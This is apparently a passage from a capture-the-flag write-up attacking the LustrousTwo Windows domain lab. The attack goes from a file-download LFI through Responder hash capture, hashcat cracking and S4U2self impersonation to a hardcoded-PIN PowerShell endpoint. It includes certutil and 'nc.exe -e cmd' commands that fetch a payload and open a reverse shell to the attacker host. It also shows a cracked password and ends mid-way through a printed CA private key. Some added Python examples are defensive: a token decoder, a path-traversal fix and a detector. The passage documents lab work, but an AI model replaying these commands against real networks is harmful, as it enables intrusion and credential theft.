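The Negotiate value IIS returned in the 200 response above is not opaque: it is a DER-encoded SPNEGO NegTokenResp, and decoding it shows which mechanism the server actually accepted, which is worth checking on a domain where NTLM is supposed to be disabled. The Python below is an added example, not from the original writeup; it parses the exact header value shown above with a minimal DER reader (no third-party library) and reports the negotiation state, the selected mechanism OID and the type of the inner Kerberos token. The OID and token-id tables are the standard values from RFC 4178 and RFC 4121; the NTLM sample at the bottom is constructed for the test.

```python
import base64

# Header value exactly as IIS returned it in the curl -I output above.
PAGE_HEADER = "Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRv9tnHvYuO3z1EsFmcl3ZHwPolBurPoW2hIAjUo5z2Kii18H+7xze2l3lnoL8kCGCZbLRZXv2bRv3uaOCp1ZHCvoRjH7uOjOVR2e/VzVzVHVf62MxfJ/Ukitdg1RLiO8yqHLWytQJlr71ipE4ym5eZ"

# Constructed sample of a raw NTLM challenge (type 2 message header only), for contrast.
NTLM_SAMPLE = base64.b64encode(b"NTLMSSP\x00\x02\x00\x00\x00").decode()

MECH_NAMES = {
    "1.2.840.113554.1.2.2": "Kerberos V5",
    "1.2.840.48018.1.2.2": "MS KRB5",
    "1.3.6.1.4.1.311.2.2.10": "NTLMSSP",
    "1.3.6.1.5.5.2": "SPNEGO",
}
NEG_STATE = {0: "accept-completed", 1: "accept-incomplete", 2: "reject", 3: "request-mic"}
KRB_TOK_ID = {0x0100: "KRB_AP_REQ", 0x0200: "KRB_AP_REP", 0x0300: "KRB_ERROR"}

def read_tlv(buf, pos=0):
    """Read one DER tag/length/value starting at pos; return (tag, value, end)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw):
    """Decode DER OID content bytes into dotted form."""
    arcs = [raw[0] // 40, raw[0] % 40]
    value = 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def describe_inner_token(token):
    """Inner GSS-API InitialContextToken: [APPLICATION 0] { mech OID, 2-byte TOK_ID, ... }."""
    if token[:1] != b"\x60":
        return "not an RFC 2743 context token"
    _, payload, _ = read_tlv(token)
    _, oid_raw, pos = read_tlv(payload)
    tok_id = int.from_bytes(payload[pos:pos + 2], "big")
    return KRB_TOK_ID.get(tok_id, f"unknown token id 0x{tok_id:04x}")

def parse_negotiate_header(value):
    """Parse a 'WWW-Authenticate: Negotiate <b64>' value (or the bare base64)."""
    result = {"neg_state": None, "mech_oid": None, "mechanism": None, "inner_token": None}
    parts = value.split(None, 1)
    if parts and parts[0] == "Negotiate":
        if len(parts) == 1:                  # the bare 401 challenge: no token yet
            result["mechanism"] = "empty challenge"
            return result
        b64 = parts[1]
    else:
        b64 = value
    token = base64.b64decode(b64)
    if token.startswith(b"NTLMSSP\x00"):    # raw NTLM rather than SPNEGO
        result["mechanism"] = "NTLMSSP"
        return result
    tag, body, _ = read_tlv(token)
    if tag != 0xA1:                          # [1] NegTokenResp
        raise ValueError(f"expected NegTokenResp (0xA1), got tag 0x{tag:02x}")
    seq_tag, seq, _ = read_tlv(body)
    if seq_tag != 0x30:
        raise ValueError("NegTokenResp body is not a SEQUENCE")
    pos = 0
    while pos < len(seq):
        field, val, pos = read_tlv(seq, pos)
        if field == 0xA0:                    # negState ENUMERATED
            result["neg_state"] = NEG_STATE.get(read_tlv(val)[1][0], "unknown")
        elif field == 0xA1:                  # supportedMech OID
            result["mech_oid"] = decode_oid(read_tlv(val)[1])
            result["mechanism"] = MECH_NAMES.get(result["mech_oid"], "unknown")
        elif field == 0xA2:                  # responseToken OCTET STRING
            result["inner_token"] = describe_inner_token(read_tlv(val)[1])
    return result

if __name__ == "__main__":
    print(parse_negotiate_header(PAGE_HEADER))
```

For the header on this page the result is negState accept-completed, mechanism Kerberos V5 and an inner KRB_AP_REP, i.e. the server finished mutual authentication with Kerberos. A NegTokenResp selecting 1.3.6.1.4.1.311.2.2.10, or a bare NTLMSSP blob, would mean the client fell back to NTLM, which the audit file on this box claims is no longer allowed.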

Curl works at this point, but to open the site in a browser you still have to configure negotiate-auth:

  1. Open about:config (Pasted image 20251001200704.png)
  2. Search for network.negotiate and add the URIs you want to reach to network.negotiate-auth.trusted-uris (Pasted image 20251001200900.png)
  3. Set network.negotiate-auth.using-native-gsslib to true (Pasted image 20251001200858.png)

Once configured you can open http://lus2dc.lustrous2.vl/
Pasted image 20251001202723.png
There is one file available for download.
It is the same hint file as the one on FTP:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl  http://lus2dc.lustrous2.vl/File/Download?fileName=audit.txt  --negotiate  -u : -o audit.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   207  100   207    0     0   1248      0 --:--:-- --:--:-- --:--:--  1254

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# cat audit.txt
Audit Report Issue Tracking

[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled

[Open] Weak User Passwords

1.5. LFI

You can then find that an LFI exists here:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl  http://lus2dc.lustrous2.vl/File/Download?fileName=../../../../../../../../../Windows/win.ini  --negotiate  -u :
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

1.6. NetNTLMv2

Here I again followed 0xdf's idea (I honestly could not think of what to read).

Tip

In most cases Windows has a convenient behaviour: when a program tries to read a file at a share (UNC) path, the system automatically tries to open the file from that share. So we can run Responder and have the server read a file from my host:

Start Responder; it automatically brings up an SMB server on port 445 of our host. Then use the LFI to include a file on my SMB server remotely:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl  http://lus2dc.lustrous2.vl/File/Download?fileName=//10.10.14.91/exp  --negotiate  -u :


┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.91]
    Responder IPv6             [dead:beef:2::1059]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-7HTEQ16GVIN]
    Responder Domain Name      [W637.LOCAL]
    Responder DCE-RPC Port     [46925]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.193.58
[SMB] NTLMv2-SSP Username : LUSTROUS2\ShareSvc
[SMB] NTLMv2-SSP Hash     : ShareSvc<hash redacted>
[*] Skipping previously captured hash for LUSTROUS2\ShareSvc
[*] Skipping previously captured hash for LUSTROUS2\ShareSvc

1.7. hashcat

hashcat.exe hash.txt rockyou.txt

SHARESVC::LUSTROUS2:1122334455667788:f8b3c11e2f39ae180632b75175b70f1f:<blob redacted>:#1Service

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SHARESVC::LUSTROUS2:1122334455667788:f8b3c11e2f39ae...000000
Time.Started.....: Wed Oct 01 20:52:29 2025 (1 sec)
Time.Estimated...: Wed Oct 01 20:52:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 18536.8 kH/s (2.68ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14344388/14344388 (100.00%)
Rejected.........: 0/14344388 (0.00%)
Restore.Point....: 14155776/14344388 (98.69%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 0213ade -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 50c Util: 66% Core:1890MHz Mem:8001MHz Bus:8

Another credential obtained:
SHARESVC : #1Service

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# nxc smb LUS2DC.Lustrous2.vl -u SHARESVC -p '#1Service' -k
SMB         LUS2DC.Lustrous2.vl 445    LUS2DC           [*]  x64 (name:LUS2DC) (domain:Lustrous2.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB         LUS2DC.Lustrous2.vl 445    LUS2DC           [+] Lustrous2.vl\SHARESVC:#1Service
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getTGT Lustrous2.vl/SHARESVC:'#1Service' -dc-ip 10.129.193.58
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in SHARESVC.ccache

But this user still is not good for much.
Pasted image 20251001210019.png

1.8. web.config

Under a web site directory there is usually a web.config file.
Its usual location is \inetpub\wwwroot\web.config, but I could not fetch it there; I tried relative paths one level at a time and finally got it:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl  http://lus2dc.lustrous2.vl/File/Download?fileName=../../web.config  --negotiate  -u :
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 4E46018E-B73C-4E7B-8DA2-87855F22435A-->

The web.config obtained through the LFI is the configuration file of an ASP.NET Core application.
From its contents we can see:

  • this is an ASP.NET Core application
  • the application assembly is LuShare.dll
  • it uses the AspNetCoreModuleV2 module
  • there is a log path .\logs\stdout
  • the ProjectGuid is 4E46018E-B73C-4E7B-8DA2-87855F22435A

Pull the DLL down:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl  http://lus2dc.lustrous2.vl/File/Download?fileName=../../LuShare.dll  --negotiate  -u : -o LuShare.dll
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 53760  100 53760    0     0   171k      0 --:--:-- --:--:-- --:--:--  171k
┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# xxd LuShare.dll|head
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
00000010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
00000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000030: 0000 0000 0000 0000 0000 0000 8000 0000  ................
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320  t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000  mode....$.......
00000080: 5045 0000 4c01 0300 6e3a 5597 0000 0000  PE..L...n:U.....
00000090: 0000 0000 e000 2200 0b01 3000 00c8 0000  ......"...0.....

1.9. DLL decompilation

Decompile it with dotPeek.
Analyze FileController.cs (Pasted image 20251001221332.png)

1.9.1. File upload

This is an ASP.NET Core controller with file sharing and management functions.

public FileController(IWebHostEnvironment environment)
{
    this._environment = environment;
    this._uploadFolder = Path.Combine(this._environment.WebRootPath, "uploads");
    if (Directory.Exists(this._uploadFolder))
      return;
    Directory.CreateDirectory(this._uploadFolder);
}
  • initializes the upload folder path as wwwroot/uploads
  • creates the folder automatically if it does not exist

GET method

[Authorize(Roles = "ShareAdmins")]
public IActionResult Upload() => (IActionResult) this.View();

POST method

[HttpPost]
[Authorize(Roles = "ShareAdmins")]
public async Task<IActionResult> Upload(IFormFile file)
{
    if (file == null || file.Length <= 0L)
      return (IActionResult) this.View();
    // only the final path component of the client-supplied name is kept
    string fileName = Path.GetFileName(file.FileName);
    // decompiler output referred to the async state machine's captured `fileController`; it is `this`
    using (FileStream stream = new FileStream(Path.Combine(this._uploadFolder, fileName), FileMode.Create))
      await file.CopyToAsync((Stream) stream);
    return (IActionResult) this.RedirectToAction("Index");
}
  • restricted to the ShareAdmins role
  • receives the uploaded file and saves it into the uploads folder

1.9.2. Download method - file download

public IActionResult Download(string fileName)
{
    if (string.IsNullOrEmpty(fileName))
      return (IActionResult) this.NotFound();
    string path = Path.Combine(this._uploadFolder, fileName);
    if (!System.IO.File.Exists(path))
      return (IActionResult) this.NotFound();
    MemoryStream memoryStream = new MemoryStream();
    using (FileStream fileStream = new FileStream(path, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))
      fileStream.CopyTo((Stream) memoryStream);
    memoryStream.Position = 0L;
    return (IActionResult) this.File((Stream) memoryStream, "application/octet-stream", fileName);
}
  • Any user can download files
  • Returns the file as a binary stream
  • Path traversal: Path.Combine() is used, but fileName is never validated, so a name such as ../../LuShare.dll resolves outside the uploads folder (which is how the DLL was fetched above)
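To make the defect concrete, here is an added example (not code from the page or from the LuShare application) that models the decompiled Download() join next to a hardened version. It is written in Python rather than C#, on the assumption that os.path.join behaves like .NET Path.Combine for the two cases that matter here: '..' segments are kept, and a rooted second argument replaces the first. UPLOAD_ROOT is a constructed path.

```python
import os
from typing import Optional

# Constructed upload root for this example; the decompiled controller uses
# wwwroot/uploads under the site root.
UPLOAD_ROOT = "/srv/lushare/wwwroot/uploads"


def vulnerable_path(upload_root: str, file_name: str) -> str:
    """Model of the decompiled Download(): Path.Combine(_uploadFolder, fileName).

    os.path.join behaves like .NET Path.Combine here (assumption): '..' segments
    are kept and a rooted second argument replaces the first, so the result can
    land anywhere on the disk, not just under upload_root.
    """
    return os.path.normpath(os.path.join(upload_root, file_name))


def safe_path(upload_root: str, file_name: str) -> Optional[str]:
    """Hardened join: accept only a bare file name that resolves to a direct
    child of upload_root. Returns the resolved path, or None when rejected."""
    if not file_name:
        return None
    # A download name must be a single path component: no separators of either
    # flavour (the app runs on Windows, where '\\' separates too) and no dot names.
    if "/" in file_name or "\\" in file_name or file_name in (".", ".."):
        return None
    root = os.path.realpath(upload_root)
    candidate = os.path.realpath(os.path.join(root, file_name))
    # Defence in depth: after resolving symlinks the parent must still be the root.
    if os.path.dirname(candidate) != root:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("report.pdf", "../../LuShare.dll", "/etc/passwd", "C:\\Windows\\win.ini"):
        print(f"{name!r:26} vulnerable -> {vulnerable_path(UPLOAD_ROOT, name)}")
        print(f"{'':26} hardened   -> {safe_path(UPLOAD_ROOT, name)}")
```

Path.GetFileName(), which the Upload action already uses, is the one-line C# equivalent of the first two checks; the realpath comparison is the extra guard against a symlink planted inside the uploads folder.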

1.9.3. Debug method - PowerShell execution

GET method

[Authorize(Roles = "ShareAdmins")]
public IActionResult Debug() => (IActionResult) this.View();

POST method (dangerous)

[Authorize(Roles = "ShareAdmins")]
[HttpPost]
public IActionResult Debug(string command, string pin)
{
>>>>     string str = "ba45c518"; // hardcoded PIN
    if (string.IsNullOrWhiteSpace(command) || command.Length > 100)
      return (IActionResult) this.BadRequest("Invalid or too long command.");
    if (!string.IsNullOrWhiteSpace(pin))
    {
      if (pin == str) // PIN check
      {
        try
        {
>>>>           using (PowerShell powerShell = PowerShell.Create())
>>>>           {
>>>>             powerShell.Runspace.SessionStateProxy.LanguageMode = PSLanguageMode.ConstrainedLanguage;
>>>>             powerShell.AddScript(command, false);
>>>>             Collection<PSObject> collection = powerShell.Invoke();
>>>>             // ... collect output and errors into stringBuilder
>>>>             return (IActionResult) this.Content(stringBuilder.ToString(), "text/plain");
          }
        }
        catch (Exception ex)
        {
          return (IActionResult) this.Content("Error running PowerShell command: " + ex.Message, "text/plain");
        }
      }
    }
    return (IActionResult) this.BadRequest("Invalid PIN.");
}
  • Anyone who knows the PIN can execute PowerShell commands here; the PIN is hardcoded in the DLL, and we know it is ba45c518
  • A user must be a member of the ShareAdmins group to reach this POST method
  • PSLanguageMode.ConstrainedLanguage gives the script a restricted PowerShell runspace intended to limit what it can do; it does not stop the script from launching external executables, as the later sections show.

1.10. Impersonation with S4U2self

The next step is to get at that PowerShell execution, and for that we first need the credentials of a ShareAdmins member.

Pasted image 20251001222659.png
Two domain users are members of this group:
SHARON.BIRCH
RYAN.DAVIES

Both users also belong to the PROTECTED USERS group:
Pasted image 20251001223018.png
This means we cannot "easily" impersonate them with techniques such as silver tickets or delegation.

S4U2self, however, is a technique that gets around this restriction. The s4u2self Kerberos extension lets a service account request a service ticket to itself on behalf of an arbitrary principal.

I already obtained a TGT for the SHARESVC user earlier, so impacket-getST can be used directly to request the service ticket:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# export KRB5CCNAME=SHARESVC.ccache

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# impacket-getST -self -impersonate ryan.davies -k 'LUSTROUS2.VL/ShareSvc:#1Service' -altservice HTTP/lus2dc.lustrous2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating ryan.davies
[*] Requesting S4U2self
[*] Changing service from ShareSvc@LUSTROUS2.VL to HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
[*] Saving ticket in ryan.davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache

Then import this ticket:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# export KRB5CCNAME=Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache

Use klist to check that the import succeeded:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# klist
Ticket cache: FILE:Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
Default principal: Ryan.Davies@lustrous2.vl

Valid starting       Expires              Service principal
10/01/2025 10:43:25  10/01/2025 18:55:45  HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
        renew until 10/02/2025 08:55:44

The ticket is imported.
It is still worth confirming with curl that the site actually accepts it:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl  --negotiate -u : 10.129.193.58 -I
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvjQdm12lOBYpNKXEFxEVHLV7uVUN0jJDwjluiHi44zZexyzw1ZjleG/+tT2Mp5oqyHAwvNpMK7d56YgITuQpEVjBBz6qzF+2BrGfZEJckrCkVfoTvOtopxyE2hBkvpYnrGOfU5op3n9V+sGd55YVC
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Wed, 01 Oct 2025 15:04:22 GMT

The 200 response shows it works.
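From the defender's side, the S4U2self request described in this section leaves a recognisable shape in the domain controller's security log: a 4769 (service ticket requested) for ryan.davies against the user account ShareSvc, from a client address where ryan.davies never obtained a TGT (4768), because the TGT used belongs to ShareSvc. The following is an added example (not from the page, the box, or any vendor tool) that correlates 4768 and 4769 records with that heuristic. The event records are constructed for the example using the EventData field names of those two events, with timestamps and addresses chosen to mirror the request above; PROTECTED_USERS is taken from the group listing in this section, and the ten-hour window is the default TGT lifetime, an assumption for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Members of Protected Users that also sit in ShareAdmins (group listing above).
PROTECTED_USERS = {"sharon.birch", "ryan.davies"}

# Constructed DC security-log records using the EventData field names of
# 4768 (TGT requested) and 4769 (service ticket requested). Times and addresses
# are made up to mirror the S4U2self request in this section.
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": "2025-10-01T10:40:02", "TargetUserName": "sharon.birch",
     "IpAddress": "::ffff:10.129.193.58"},
    {"EventID": 4769, "Time": "2025-10-01T10:40:03", "TargetUserName": "sharon.birch@LUSTROUS2.VL",
     "ServiceName": "LUS2DC$", "IpAddress": "::ffff:10.129.193.58"},
    # ShareSvc obtains its own TGT from the attacker host ...
    {"EventID": 4768, "Time": "2025-10-01T10:41:10", "TargetUserName": "ShareSvc",
     "IpAddress": "::ffff:10.10.14.91"},
    # ... then a ticket *to* ShareSvc is issued *for* ryan.davies from the same
    # host, although ryan.davies never got a TGT there: the S4U2self shape.
    {"EventID": 4769, "Time": "2025-10-01T10:43:25", "TargetUserName": "ryan.davies@LUSTROUS2.VL",
     "ServiceName": "ShareSvc", "IpAddress": "::ffff:10.10.14.91"},
]


def principal(name: str) -> str:
    """Normalise 'User@REALM' or 'user' to a lower-case bare account name."""
    return name.split("@", 1)[0].lower()


def is_user_account(service_name: str) -> bool:
    """Computer accounts end in '$' and krbtgt is the TGS itself; anything else
    is a user (service) account, the kind S4U2self is requested against."""
    bare = principal(service_name)
    return not bare.endswith("$") and bare != "krbtgt"


def find_s4u2self_candidates(events, tgt_window: timedelta = timedelta(hours=10)) -> List[Dict[str, str]]:
    """Flag 4769 events that look like S4U2self: a service ticket to a user
    account, issued for a different user who has no TGT (4768) from the same
    client address within tgt_window (assumed default TGT lifetime)."""
    tgts: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4768:
            key = (principal(ev["TargetUserName"]), ev["IpAddress"])
            tgts[key].append(datetime.fromisoformat(ev["Time"]))
    hits: List[Dict[str, str]] = []
    for ev in events:
        if ev["EventID"] != 4769 or not is_user_account(ev["ServiceName"]):
            continue
        user, service = principal(ev["TargetUserName"]), principal(ev["ServiceName"])
        if user == service:
            continue  # an account talking to its own SPN is not impersonation
        when = datetime.fromisoformat(ev["Time"])
        if any(when - tgt_window <= t <= when for t in tgts[(user, ev["IpAddress"])]):
            continue  # the user really authenticated from this address: ordinary ticket
        hits.append({"time": ev["Time"], "user": user, "service": ev["ServiceName"],
                     "client": ev["IpAddress"],
                     "severity": "high" if user in PROTECTED_USERS else "medium"})
    return hits


if __name__ == "__main__":
    for hit in find_s4u2self_candidates(SAMPLE_EVENTS):
        print(hit)
```

Two caveats when running this against a real domain: TGT events must be collected from every DC, or a user whose TGT came from another DC is flagged falsely; and the -altservice rename performed by getST happens on the client, so the KDC only ever logs ShareSvc as the service name and HTTP/lus2dc.lustrous2.vl never appears in 4769.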

1.11. Reverse shell through the Debug endpoint

Log in to the web page again:
Pasted image 20251001232204.png
Your identity is now the administrator.

Execute commands through the Debug endpoint:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug \
   -X POST \
   -H "Content-Type: application/x-www-form-urlencoded" \
   -d "command=Get-ChildItem C:\&pin=ba45c518"
C:\datastore
C:\inetpub
C:\PerfLogs
C:\Program Files
C:\Program Files (x86)
C:\Public
C:\temp
C:\Users
C:\Windows
C:\user_2e9c1.txt

The same can be done from the web page:
Pasted image 20251001232753.png Pasted image 20251001232759.png

Then upload nc.exe and spawn a reverse shell:

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug \
  -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "command=certutil -f -split -urlcache http://10.10.14.91:80/nc.exe&pin=ba45c518"
****  Online  ****
  0000  ...
  6e00
CertUtil: -URLCache command completed successfully.


┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug \
  -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "command=./nc.exe -e cmd 10.10.14.91 4444&pin=ba45c518"
  
  

┌──(root㉿kali)-[~/Desktop/htb/LustrousTwo]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.91] from (UNKNOWN) [10.129.193.58] 56632
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.

C:\inetpub\lushare>whoami
whoami
lustrous2\sharesvc

C:\inetpub\lushare>

2. System

2.1. Privilege escalation via Velociraptor

Under \Program Files there are some unusual directories:

C:\Program Files>dir
dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\Program Files

04/14/2025  02:57 AM    <DIR>          .
04/14/2025  03:05 AM    <DIR>          Amazon
08/31/2024  01:03 AM    <DIR>          Common Files
09/06/2024  05:39 AM    <DIR>          dotnet
09/06/2024  05:38 AM    <DIR>          IIS
04/14/2025  04:50 PM    <DIR>          Internet Explorer
05/08/2021  01:20 AM    <DIR>          ModifiableWindowsApps
>>>> 09/06/2024  08:35 AM    <DIR>          Velociraptor
>>>> 09/06/2024  08:34 AM    <DIR>          VelociraptorServer
04/14/2025  02:57 AM    <DIR>          VMware
08/31/2024  01:55 AM    <DIR>          Windows Defender
06/26/2025  07:12 AM    <DIR>          Windows Defender Advanced Threat Protection
04/14/2025  04:50 PM    <DIR>          Windows Mail
04/14/2025  04:50 PM    <DIR>          Windows Media Player
05/08/2021  02:35 AM    <DIR>          Windows NT
04/14/2025  04:50 PM    <DIR>          Windows Photo Viewer
05/08/2021  01:34 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              17 Dir(s)   4,740,476,928 bytes free

c:\Program Files>

Velociraptor is a digital forensics and incident response tool developed by Rapid7 that collects data from endpoints.
There is also a VelociraptorServer folder, which means this machine is both a Velociraptor client and a Velociraptor server.

c:\Program Files\VelociraptorServer>dir
dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\Program Files\VelociraptorServer

09/06/2024  08:34 AM    <DIR>          .
04/14/2025  02:57 AM    <DIR>          ..
09/06/2024  08:34 AM             2,563 client.config.yaml
>>>> 09/29/2025  07:38 AM            13,056 server.config.yaml
09/06/2024  08:03 AM        60,144,064 velociraptor-v0.72.4-windows-amd64.exe
               3 File(s)     60,159,683 bytes
               2 Dir(s)   4,740,337,664 bytes free
               
c:\Program Files\VelociraptorServer>type server.config.yaml

<SNIP>

>>>> CA:
>>>>   private_key: |
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpQIBAAKCAQEA4ycNgoEBGTgOFhs9okotlq3uN9lxxjzZkkgm+O0xtwSFu2D7
    w+9363BIYV9osVi1z6X7O6kHTHvWYua1dekYF8NuUfcdd2sFOdSfylHjYjMZq0Af
    SkglBzt3vJAxLiwtMFduiu+k1V/CiJtL5JST+Jqb+zI/QoBwTeKhsE6gdcu4dsMk
    2p1CZcGrGP5RlObu8OMI9s+vjjjgPv0vTRIid0sPn3HfnZmtgpM6hRGIqGtxhA/r
    3iH7vjhUclmjtz3HtoFee2V55YtwIbUDKBW9cOZejuSEM4aylO4p3Nykm/JBvtr8
    0AeI8Bi1NPsG0pMnJF2PuefdriBt7Vb3cvi/WwIDAQABAoIBAHUmxwjvj6l6B4nP
    MtJof2qe+aVEODGNYIjZPYBUlLdXVcF2G2LKNobuueW+VzhgECSv7gqu+lyv4bnQ
    UvYk6ZAX8uXDFSdpwqA40NB/u04CHNL9lyWwX6iDOxW9KCAwGH4+GXz+a3zAjov1
    zAZvuoEU/C1plMavhzwkDk/nvUoCdrSLNPsz0s0RbNkR7fPcJ2QrwYIyHhNb56Ab
    Jyy4A8gXUz0zkL4Upk6bHPxhFeW9gA9BlAcB8DsdcPxTqbrus+B3yrfKO+hqWT0w
    /jtDssJxdnkULazO2e9ypEJ2XsNEr4NYi1PcsHD667T6EnKQm6odGWN/455FWbt0
    LFfoCkECgYEA7bUZ8wZh8M4C+JRm5fKq7N/pIQniQfDf+naFy7nG+9QiZIsofyHB
    0PiuzSXNDEVsaSJn5cn4+BFO1RfRaHmM/sUsrKzaUKO5fTa4aAhZXUBmdw+s1Sm1
    HbXea/uKTQEdzwL/tcRBQxIr2RveCCykYO/p5pTd9YKVtCGx5PgOHYcCgYEA9KIE
    fqvfHP4NZDbsExC83K3Dgx3MKUlKosyBRVdQW6d/eJJymEa5WcHOxM9Q81ZOi7VS
